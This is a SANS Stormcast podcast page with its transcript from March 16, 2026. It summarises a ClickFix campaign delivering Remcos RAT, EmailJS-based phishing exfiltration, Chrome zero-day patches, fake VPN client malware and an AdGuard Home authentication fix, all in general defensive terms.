Podcast Detail

SANS Stormcast Monday, March 16th, 2026: SmartApeSG and Remcos RAT; React Based Phishing; Google Chrome Patches; AdGaurd Vuln

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9850.mp3

previous
Podcast Logo
SmartApeSG and Remcos RAT; React Based Phishing; Google Chrome Patches; AdGaurd Vuln
00:00

SmartApeSG campaign uses ClickFix page to push Remcos RAT
https://isc.sans.edu/diary/SmartApeSG%20campaign%20uses%20ClickFix%20page%20to%20push%20Remcos%20RAT/32796

A React-based phishing page with credential exfiltration via EmailJS
https://isc.sans.edu/diary/32794

Google Chrome announced two zero-day fixes, then removed one.
https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop_12.html

AdGuard Vulnerability
https://github.com/AdguardTeam/AdGuardHome/releases/tag/v0.107.73

Podcast Transcript

 Hello and welcome to the Monday, March 16, 2026 edition
 of the SANS Internet Storm Center's Stormcast. My name is
 Johannes Ullrich, recording today from Jacksonville,
 Florida. And this episode is brought to you by the SANS.edu
 graduate certificate program in Purple Team Operations. And
 today we got a couple of interesting diaries to talk
 about. The first one is by Brad about a click fix
 campaign that is then pushing Remco's RAT. Now this is all
 associated with SmartApeSG, a threat actor that Brad has
 talked about before. In the past they have deployed other
 RATs like for example NetSupport Manager. Overall
 the attack is well what we have seen so many times where
 a victim is presented with a fake captcha that tricks them
 into copy pasting a command into their Windows system that
 will then download the malware. As usual Brad is
 sharing also all the evidence including packet captures and
 the like. So this is a great diary kind of to follow along
 Brad's analysis and learn also a little bit more about how to
 analyze these kind of compromises. And the second
 diary from this weekend comes from Jan and Jan is looking at
 an interesting phishing trick being played here. It all
 starts fairly straightforward. The victim receives a PDF. The
 PDF itself is harmless other than it contains a link to a
 Cloudflare worker. And that Cloudflare worker is used in
 order to display the phishing page with a lot of JavaScript.
 Now the one trick here that the attacker is displaying the
 attacker is collecting of course credentials and in the
 example that Jan shows they're impersonating Dropbox. But
 they have to get the credentials somehow to the
 attacker. In the past we have seen stuff used like Telegram
 for example is very popular. A bunch of different APIs. What
 they're using in this particular case is email.js.
 Email.js allows you to send email with JavaScript. Of
 course JavaScript itself doesn't allow you to like
 speak SMTP or such. So instead they're connecting to the
 email.js web service that allows you to then send HTTP
 requests to the web service. That will then result in the
 email being sent to the attacker. So an interesting
 twist on this. Of course I think it makes it a little bit
 easier than to actually find the attacker given that you
 can check what email.js account or so they're using.
 And that may be a little bit of a vulnerability here in
 this particular scheme. But then again as long as it lasts
 a day or two. That's probably all attackers need in order to
 call this particular phishing campaign successful. Well then
 we got a little bit of patch drama with Google Chrome. On
 Thursday Google released a new version of Chrome. Stating
 that they patched the two critical vulnerabilities in
 Google Chrome that were already exploited in the wild.
 On Friday they corrected the notice stating that this
 update actually only fixes one of these vulnerabilities. And
 the second is going to be updated in the next version of
 Google Chrome. So there is still an outstanding already
 exploited vulnerability that will hopefully be patched
 soon. Just now make sure that you keep Google Chrome
 patched. As I always say at least once a day restart
 Google Chrome. And once a week double check that you're
 running the latest version. Microsoft published a blog
 post with details regarding a campaign they are currently
 observing that tricks users into downloading malicious VPN
 clients. It all starts with good old search engine
 optimization. So that's still a thing sadly. If the user
 searches for VPN client they are then being directed to a
 fake website that imitates the particular manufacturer. And
 then the download will actually capture the
 credentials as the user types them in. There are a number of
 different VPN clients being impersonated here by this
 particular malware. Like Pulse Secure is like one but also
 Fortinet and a couple of other. Cisco I think also
 there is not a vulnerability really in any of these VPN
 systems. But just malicious software that the user is
 tricked into installing. It's digitally signed using a
 Chinese certificate. Unclear where that came from but
 likely stolen from the rightful owner. And with all
 of the search engine optimization tricks and in
 many cases also paid malicious advertisements. Of course one
 defense is to run some kind of ad blocker. Well if you're
 running AdGuard Home there's an update for you. It does fix
 an authentication issue that would allow an attacker to
 gain full access to AdGuard Home without valid
 credentials. I'm not sure how severe this vulnerability or
 exploitable it is given that it does require a transition
 from HP to clear text. And to basically encrypted or HP to
 over TLS. And browsers typically don't support HP to
 clear text. So maybe difficult to exploit but please keep
 your systems updated. And this time it's AdGuard's time. Well
 and this is it for today. So thanks again for listening.
 Thanks for liking. Thanks for subscribing to this podcast.
 And talk to you again tomorrow. Bye.